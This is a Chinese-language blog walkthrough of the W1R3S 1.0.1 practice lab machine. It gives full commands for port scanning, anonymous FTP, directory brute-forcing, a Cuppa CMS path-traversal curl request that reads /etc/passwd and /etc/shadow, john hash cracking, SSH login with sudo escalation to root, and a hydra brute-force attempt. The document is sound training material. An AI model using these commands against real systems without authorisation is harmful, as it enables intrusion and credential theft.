W1R3S_1.0.1打靶日记

1. nmap扫描

1.1 IP地址确定

sudo nmap -sn 192.168.31.0/24 //-sn: Ping Scan - disable port scan
sudo arl-scan -l //功能类似

扫描当前网段存活的主机,指定一个C类地址进行扫描,扫描该地址段是否有主机存活;

image-20240507155041932

通过开关靶机再次对本机网段进行扫描可以确定靶机的ip地址,以下是打开靶机的ip地址查询;

image-20240507155421958

可以确定靶机的ip地址为192.168.31.52

1.2 端口扫描

nmap -sT –min-rate 10000 -p- 192.168.31.52 -oA nmapscan/w1r3sports

-sT: 使用tcp三次握手的过程进行探测端口是否开放(相对较慢,但相对准确);

-sS: 默认扫描方式,通过syn标志位进行检测连接是否开放(容易被防火墙挡住);

-oA:以全格式保存在后续的地址文件中,以三种不同的后缀文件名保存;

--min-rate: 指定扫描的速度,在正式的护网中要比10000还慢;

-p:指定扫描端口,-p-指的是从1到65535端口

image-20240507160325015

grep open w1r3sports.nmap | awk -F’/‘ ‘{print $1}’ | paste -sd ‘,’

-F'/':以’/‘分隔提取字符串

$1:是指分隔后的第一个变量

image-20240507160445016

sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.31.52 -oA nmapscan/portsdetail

-sV:扫描提供服务的版本

-sC:用默认的脚本进行扫描

-O:扫描操作系统的版本

image-20240507161230829

优先级最高的端口是21和3306,观看是否能给我们提取到什么东西

然后再看端口80,兔子洞,重点检查

优先级最低的端口是22,一般情况下不可能是直接通过ssh登录

sudo nmap -sU –top-ports 20 192.168.31.52 -oA nmapscan/udpports

--top-ports:扫描最常用的n个端口,空格接数量;

image-20240507161143441

sudo nmap -script=vuln -p21,22,80,3306 192.168.31.52 -oA nmapscan/vuln

nmap的端口漏洞扫描

image-20240507162205500

1.3 ftp连接测试

ftp 192.168.31.52

binary

ls

cd content

prompt

mget *.txt //批量下载文件

get 01.txt //单个文件下载

ftp连接,通过使用anonymous匿名登录,密码为空,登录后切换二进制模式,否则可能下载下来的可执行文件是坏文件,无法使用

image-20240507162458445

image-20240507162623214

查看下载文件的内容:

image-20240507162435233

可以看到有许多的加密代码,例如下方

01ec2d8fc11c493b25029fb1f47f39ce

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

 ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

.punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

2. hash-identifier工具

帮助识别字符串是什么加密算法;

image-20240507201022086

可以看到相应的字符串应该是md5加密,通过MD5解密即可

3. 解密密文

对于上述得出密文进行解密

01ec2d8fc11c493b25029fb1f47f39ce

This is not a password

通过hash-identifier可以知道这是md5加密,使用md5解密工具即可解密得出

image-20240507201644444

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

echo "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d

在多接触加密密文后,可以感知这大概率是base64加密,经典的双等号结尾

It is easy, but not that easy..

image-20240507201851684

直接使用echo命令即可解密

​ ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

.punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

反转文本:https://www.upsidedowntext.com/

image-20240507202506542

image-20240507202521988

4. 3306端口sql测试

mysql -h 192.168.31.52 -u root -p

测试是否存在相应的漏洞或是否能够获得什么其他的信息

image-20240507202934962

5. gobuster目录爆破

sudo gobuster dir -u http://192.168.31.52 –wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20240507205610907

可以看出爆破除了的几个目录分别为

http://192.168.31.52/wordpress

http://192.168.31.52/javascript

http://192.168.31.52/administrator

image-20240507205804520

image-20240507205814278

image-20240507205838447

能够获得的信息是在网址http://192.168.31.52/administrator下看到的cuppa CMS框架

查询该CMS是否存在相应漏洞

第一个http://192.168.31.52/wordpress网址无法访问,即使通过修改host依旧无法访问,虽然无法完全排除漏洞,但是已经没有太多切入点了.

6. 漏洞搜索

searchsploit cuppa cms

image-20240507210427028

searchsploit cuppa cms -m 25971

7. 浏览器发送数据

http://192.168.31.52/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

image-20240507210859003

可能是post传输导致传输失败,通过网页搜索找到cms源码进行审计,发现确实是post传输导致数据传输失败

image-20240507211121754

将数据url编码以post方式传输

curl –data-urlencode ‘urlConfig=../../../../../../../../../etc/passwd’ http://192.168.31.52/administrator/alerts/alertConfigField.php

image-20240507211654580

可以看到列出了passwd的内容,然后读出hash的shadow文件的内容

/etc/shadow 文件,用于存储 Linux 系统中用户通过hash加密的密码信息,又称为“影子文件”。

由于/etc/passwd文件允许所有用户读取,易导致用户密码泄露,因此 Linux 系统将用户的密码信息从 /etc/passwd 文件中分离出来,并单独放到了此文件中。

curl –data-urlencode ‘urlConfig=../../../../../../../../../etc/shadow’ http://192.168.31.52/administrator/alerts/alertConfigField.php

image-20240507211948113

将该部分的内容复制保存下来,并将没有hash值得用户删除,得到

image-20240507212348687

8. hash爆破

john shadow.hash

破解密码

image-20240507212631246

可以看到已经破解得到两个,测试使用ssh进行连接

www-data一般是功能型账户

image-20240507212726362

成功连接w1r3s账户,通过id命令可以得知其具有sudo权限,通过sudo su命令成功获得系统root权限.

至此完成提权.

image-20240507213005562

9. hydra破解ssh

一般不使用该方法,没什么技术含量可言

创建字典

vim user.list

w1r3s

admin

root

hydra -l user.list -P /usr/share/wordlists/rockyou.txt ssh:192.168.31.52 -t 4

image-20240507214604323

有博主破解出来了,反正我没破解出来,再见了,下机,反正不是什么实用的方法.


W1R3S_1.0.1打靶日记
http://candyb0x.github.io/2024/05/07/W1R3S-1-0-1打靶日记/
作者
Candy
发布于
2024年5月7日
更新于
2024年5月16日
许可协议